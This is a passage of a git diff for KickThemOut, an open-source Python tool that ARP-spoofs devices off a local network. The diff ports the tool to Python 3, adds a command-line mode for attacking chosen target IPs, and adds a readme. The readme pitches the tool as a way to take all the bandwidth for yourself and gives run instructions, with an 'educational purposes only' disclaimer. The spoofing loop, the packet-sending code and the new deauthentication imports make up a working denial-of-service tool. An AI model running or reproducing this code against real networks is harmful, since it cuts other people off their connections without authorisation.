itself) + spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, host[0], host[1]) + reScan += 1 + if reScan == 4: + reScan = 0 + scanNetwork() + if options.packets is not None: + time.sleep(60/float(options.packets)) + else: + time.sleep(10) + except KeyboardInterrupt: + print("\n{}Re-arping{} targets...{}".format(RED, GREEN, END)) + reArp = 1 + while reArp != 10: + # broadcast ARP packets with legitimate info to restore connection + for host in hostsList: + if host[0] != defaultGatewayIP: + try: + # dodge gateway + spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, host[0], host[1]) + except KeyboardInterrupt: + pass + except: + runDebug() + reArp += 1 + time.sleep(0.2) + print("{}Re-arped{} targets successfully.{}".format(RED, GREEN, END)) + + + # script's main function def main(): # display heading heading() - print( - "\n{0}Using interface '{1}" + defaultInterface + "{2}' with mac address '{3}" + defaultInterfaceMac + "{4}'.\nGateway IP: '{5}" - + defaultGatewayIP + "{6}' --> {7}" + str(len(hostsList)) + "{8} hosts are up.{9}").format(GREEN, RED, GREEN, RED, GREEN, - RED, GREEN, RED, GREEN, END) - # display warning in case of no active hosts - if len(hostsList) == 0 or len(hostsList) == 1: - if len(hostsList) == 1: - if hostsList[0][0] == defaultGatewayIP: - print("\n{0}{1}WARNING: There are {2}0{3} hosts up on you network except your gateway.\n\tYou can't kick anyone off {4}:/{5}\n").format( - GREEN, RED, GREEN, RED, GREEN, END) - raise SystemExit - else: - print( - "\n{0}{1}WARNING: There are {2}0{3} hosts up on you network.\n\tIt looks like something went wrong {4}:/{5}").format( - GREEN, RED, GREEN, RED, GREEN, END) - print( - "\n{0}If you are experiencing this error multiple times, please submit an issue here:\n\t{1}https://github.com/k4m4/kickthemout/issues\n{2}").format( - RED, BLUE, END) - raise SystemExit + if interactive: - try: - - while True: - - optionBanner() - - header = ('{0}kickthemout{1}> {2}'.format(BLUE, WHITE, END)) - choice = raw_input(header) - - if choice.upper() == 'E' or choice.upper() == 'EXIT': - print('\n{0}Thanks for dropping by.' - '\nCatch ya later!{1}').format(GREEN, END) - raise SystemExit - elif choice == '1': - kickoneoff() - elif choice == '2': - kicksomeoff() - elif choice == '3': - kickalloff() - elif choice.upper() == 'CLEAR': - os.system("clear||cls") + print("\n{}Using interface '{}{}{}' with MAC address '{}{}{}'.\nGateway IP: '{}{}{}' --> {}{}{} hosts are up.{}".format( + GREEN, RED, defaultInterface, GREEN, RED, defaultInterfaceMac, GREEN, RED, defaultGatewayIP, GREEN, RED, str(len(hostsList)), GREEN, END)) + # display warning in case of no active hosts + if len(hostsList) == 0 or len(hostsList) == 1: + if len(hostsList) == 1: + if hostsList[0][0] == defaultGatewayIP: + print("\n{}{}WARNING: There are {}0 hosts up{} on you network except your gateway.\n\tYou can't kick anyone off {}:/{}\n".format( + GREEN, RED, GREEN, RED, GREEN, END)) + os._exit(1) else: - print("\n{0}ERROR: Please select a valid option.{1}\n").format(RED, END) + print( + "\n{}{}WARNING: There are {}0 hosts{} up on you network.\n\tIt looks like something went wrong {}:/{}".format( + GREEN, RED, GREEN, RED, GREEN, END)) + print( + "\n{}If you are experiencing this error multiple times, please submit an issue here:\n\t{}https://github.com/k4m4/kickthemout/issues\n{}".format( + RED, BLUE, END)) + os._exit(1) + + else: + + print("\n{}Using interface '{}{}{}' with MAC address '{}{}{}'.\nGateway IP: '{}{}{}' --> Target(s): '{}{}{}'.{}".format( + GREEN, RED, defaultInterface, GREEN, RED, defaultInterfaceMac, GREEN, RED, defaultGatewayIP, GREEN, RED, ", ".join(options.targets), GREEN, END)) + + if options.targets is None and options.scan is False: + + try: + + while True: + + optionBanner() + + header = ('{}kickthemout{}> {}'.format(BLUE, WHITE, END)) + choice = input(header) + + if choice.upper() == 'E' or choice.upper() == 'EXIT': + shutdown() + + elif choice == '1': + kickoneoff() + + elif choice == '2': + kicksomeoff() + + elif choice == '3': + kickalloff() + + elif choice.upper() == 'CLEAR': + os.system("clear||cls") + else: + print("\n{}ERROR: Please select a valid option.{}\n".format(RED, END)) + + except KeyboardInterrupt: + shutdown() + + elif options.scan is not False: + stopAnimation = False + t = threading.Thread(target=scanningAnimation, args=('Scanning your network, hang on...',)) + t.daemon = True + t.start() + + # commence scanning process + try: + scanNetwork() + except KeyboardInterrupt: + shutdown() + stopAnimation = True + + print("\nOnline IPs: ") + for i in range(len(onlineIPs)): + mac = "" + for host in hostsList: + if host[0] == onlineIPs[i]: + mac = host[1] + try: + hostname = utils.socket.gethostbyaddr(onlineIPs[i])[0] + except: + hostname = "N/A" + vendor = resolveMac(mac) + print(" [{}{}{}] {}{}{}\t{}{}\t{} ({}{}{}){}".format(YELLOW, str(i), WHITE, RED, str(onlineIPs[i]), BLUE, mac, GREEN, vendor, YELLOW, hostname, GREEN, END)) + + else: + + nonInteractiveAttack() + - except KeyboardInterrupt: - print('\n\n{0}Thanks for dropping by.' - '\nCatch ya later!{1}').format(GREEN, END) if __name__ == '__main__': - os.system("clear||cls") + + # implement option parser + optparse.OptionParser.format_epilog = lambda self, formatter: self.epilog + + version = '2.0' + examples = ('\nExamples:\n'+ + ' sudo python3 kickthemout.py --target 192.168.1.10 \n'+ + ' sudo python3 kickthemout.py -t 192.168.1.5,192.168.1.10 -p 30\n'+ + ' sudo python3 kickthemout.py -s\n'+ + ' sudo python3 kickthemout.py (interactive mode)\n') + + parser = optparse.OptionParser(epilog=examples, + usage='sudo python3 %prog [options]', + prog='kickthemout.py', version=('KickThemOut ' + version)) + + parser.add_option('-p', '--packets', action='store', + dest='packets', help='number of packets broadcasted per minute (default: 6)') + + parser.add_option('-s', '--scan', action='store_true', default=False, + dest='scan', help='perform a quick network scan and exit') + + def targetList(option, opt, value, parser): + setattr(parser.values, option.dest, value.split(',')) + parser.add_option('-t', '--target', action='callback', + callback=targetList, type='string', + dest='targets', help='specify target IP address(es) and perform attack') + + (options, argv) = parser.parse_args() + + try: + if checkInternetConnection(): + pass + else: + print("\n{}ERROR: It seems that you are offline. Please check your internet connection.{}\n".format(RED, END)) + os._exit(1) + except KeyboardInterrupt: + shutdown() # configure appropriate network info - sys.stdout.write("{0}Scanning your network, hang on...{1}\r".format(GREEN, END)) - sys.stdout.flush() - defaultInterface = getDefaultInterface() - defaultGatewayIP = getGatewayIP() - defaultInterfaceMac = getDefaultInterfaceMAC() - global defaultGatewayMacSet - defaultGatewayMacSet = False + try: + defaultInterface = getDefaultInterface() + defaultGatewayIP = getGatewayIP() + defaultInterfaceMac = getDefaultInterfaceMAC() + global defaultGatewayMacSet + defaultGatewayMacSet = False + except KeyboardInterrupt: + shutdown() - # commence scanning process - scanNetwork() - main() + if (options.packets is not None and (options.packets).isdigit()) or options.packets is None: + pass + else: + print("\n{}ERROR: Argument for number of packets broadcasted per minute must be an integer {}(e.g. {}--packet 60{}).\n".format(RED, END, BLUE, END)) + os._exit(1) + + if options.targets is None: + # set to interactive attack + interactive = True + global stopAnimation + stopAnimation = False + t = threading.Thread(target=scanningAnimation, args=('Scanning your network, hang on...',)) + t.daemon = True + t.start() + + # commence scanning process + try: + scanNetwork() + except KeyboardInterrupt: + shutdown() + stopAnimation = True + + else: + # set to non-interactive attack + interactive = False + + main() \ No newline at end of file diff --git a/readme.md b/readme.md new file mode 100644 index 0000000..9691786 --- /dev/null +++ b/readme.md @@ -0,0 +1,142 @@ +![KickThemOut Logo](http://nikolaskama.me/content/images/2017/02/kickthemout_small.png) + +# KickThemOut + +> [KickThemOut](https://nikolaskama.me/kickthemoutproject) - **Kick Devices Off Your Network** + +A tool to kick devices out of your network and enjoy all the bandwidth for yourself. +It allows you to select specific or all devices and ARP spoofs them off your local area network. + +- Compatible with Python **3+**🎉. + +- *Not* compatible with Windows. + +Authors: [Nikolaos Kamarinakis](mailto:nikolaskam@gmail.com) & [David Schütz](mailto:xdavid@protonmail.com). + +[![Build Badge](https://travis-ci.org/k4m4/kickthemout.svg?branch=master)](https://travis-ci.org/k4m4/kickthemout) +[![License Badge](https://img.shields.io/badge/license-MIT-blue.svg)](https://github.com/k4m4/kickthemout/blob/master/LICENSE) +[![GitHub Stars](https://img.shields.io/github/stars/k4m4/kickthemout.svg)](https://github.com/k4m4/kickthemout/stargazers) + +------------- + +# Installation + +## Debian Installation + +You can download KickThemOut by cloning the [Git Repo](https://github.com/k4m4/kickthemout) and simply installing its requirements: + +``` +~ ❯❯❯ sudo apt-get update && sudo apt-get install nmap + +~ ❯❯❯ git clone https://github.com/k4m4/kickthemout.git + +~ ❯❯❯ cd kickthemout/ + +~/kickthemout ❯❯❯ sudo -H pip3 install -r requirements.txt + +~/kickthemout ❯❯❯ sudo python3 kickthemout.py +``` + + +## MacOS Installation + +If you would like to install KickThemOut on a Mac, please run the following: + +``` +~ ❯❯❯ brew install libdnet + +~ ❯❯❯ git clone https://github.com/k4m4/kickthemout.git + +~ ❯❯❯ cd kickthemout/ + +~/kickthemout ❯❯❯ sudo -H pip3 install -r requirements.txt + +~/kickthemout ❯❯❯ sudo python3 kickthemout.py +``` + +**NOTE**: You need to have [Homebrew](http://brew.sh/) installed before running the Mac OS installation. + +Also, **keep in mind** that you might be asked to run some commands after executing the 2nd last command. + + +## Arch Installation + +You can download KickThemOut on an Arch based system by executing the following: + +``` +~ ❯❯❯ git clone https://github.com/k4m4/kickthemout.git + +~ ❯❯❯ cd kickthemout/ + +~ ❯❯❯ sudo -H pip3 install -r requirements.txt + +~/kickthemout ❯❯❯ sudo python3 kickthemout.py +``` + +
+ +# Usage + +``` +Usage: sudo python3 kickthemout.py [options] + +Options: + --version show program's version number and exit + -h, --help show this help message and exit + -p PACKETS, --packets=PACKETS + number of packets broadcasted per minute (default: 6) + -s, --scan perform a quick network scan and exit + -t TARGETS, --target=TARGETS + specify target IP address(es) and perform attack + +Examples: + sudo python3 kickthemout.py --target 192.168.1.10 + sudo python3 kickthemout.py -t 192.168.1.5,192.168.1.10 -p 30 + sudo python3 kickthemout.py (interactive mode) +``` + +To view all available options run: + +``` +~/kickthemout ❯❯❯ sudo python3 kickthemout.py -h +``` + + +
+ +# Demo + +Here's a short demo: + +[![Asciinema Demo](https://nikolaskama.me/content/images/2017/01/kickthemout_asciinema.png)](https://asciinema.org/a/98200?autoplay=1&loop=1) + +(For more demos click [here](https://asciinema.org/~k4m4)) + + +
+ +# Developers + +* Nikolaos Kamarinakis - [@nikolaskama](https://twitter.com/nikolaskama) +* David Schütz - [@xdavidhu](https://twitter.com/xdavidhu) + + +
+ +# Disclaimer + +KickThemOut is provided as is under the MIT Licence (as stated below). +It is built for educational purposes *only*. If you choose to use it otherwise, the developers will not be held responsible. Please, do not use it with evil intent. + + +
+ +# License + +Copyright (c) 2017-18 by [Nikolaos Kamarinakis](mailto:nikolaskam@gmail.com) & [David Schütz](mailto:xdavid@protonmail.com). Some rights reserved. + +KickThemOut is under the terms of the [MIT License](https://www.tldrlegal.com/l/mit), following all clarifications stated in the [license file](https://raw.githubusercontent.com/k4m4/kickthemout/master/LICENSE). + + +For more information head over to the [official project page](https://nikolaskama.me/kickthemoutproject). +You can also go ahead and email me anytime at **nikolaskam{at}gmail{dot}com** or David at **xdavid{at}protonmail{dot}com**. \ No newline at end of file diff --git a/requirements.txt b/requirements.txt index 751c072..489a5ac 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,2 +1,3 @@ -scapy -python-nmap \ No newline at end of file +scapy-python3 +python-nmap +netifaces \ No newline at end of file diff --git a/scan.py b/scan.py index e57354c..d7d08ec 100644 --- a/scan.py +++ b/scan.py @@ -1,21 +1,25 @@ -#!/usr/bin/env python +#!/usr/bin/env python3 # -.- coding: utf-8 -.- # scan.py -# authors: k4m4 & xdavidhu +""" +Copyright (C) 2017-18 Nikolaos Kamarinakis (nikolaskam@gmail.com) & David Schütz (xdavid@protonmail.com) +See License at nikolaskama.me (https://nikolaskama.me/kickthemoutproject) +""" + +import nmap + +# perform a network scan with nmap def scanNetwork(network): - # Function for performing a network scan with nmap with the help of the python-nmap module returnlist = [] - import nmap nm = nmap.PortScanner() - a = nm.scan(hosts=network, arguments='-sP') + a = nm.scan(hosts=network, arguments='-sn') - for k, v in a['scan'].iteritems(): + for k, v in a['scan'].items(): if str(v['status']['state']) == 'up': try: returnlist.append([str(v['addresses']['ipv4']), str(v['addresses']['mac'])]) except: pass - # returnlist = hostsList array return returnlist diff --git a/spoof.py b/spoof.py index dea1a5c..8a8872f 100644 --- a/spoof.py +++ b/spoof.py @@ -1,10 +1,9 @@ -#!/usr/bin/env python +#!/usr/bin/env python3 # -.- coding: utf-8 -.- # spoof.py -# authors: k4m4 & xdavidhu """ -Copyright (C) 2016 Nikolaos Kamarinakis (nikolaskam@gmail.com) & David Schütz (xdavid@protonmail.com) +Copyright (C) 2017-18 Nikolaos Kamarinakis (nikolaskam@gmail.com) & David Schütz (xdavid@protonmail.com) See License at nikolaskama.me (https://nikolaskama.me/kickthemoutproject) """ @@ -15,11 +14,15 @@ from scapy.all import ( getmacbyip, ARP, Ether, - sendp + sendp, + conf, + RadioTap, + Dot11, + Dot11Deauth ) +# send malicious ARP packets def sendPacket(my_mac, gateway_ip, target_ip, target_mac): - # Function for sending the malicious ARP packets out with the specified data ether = Ether() ether.src = my_mac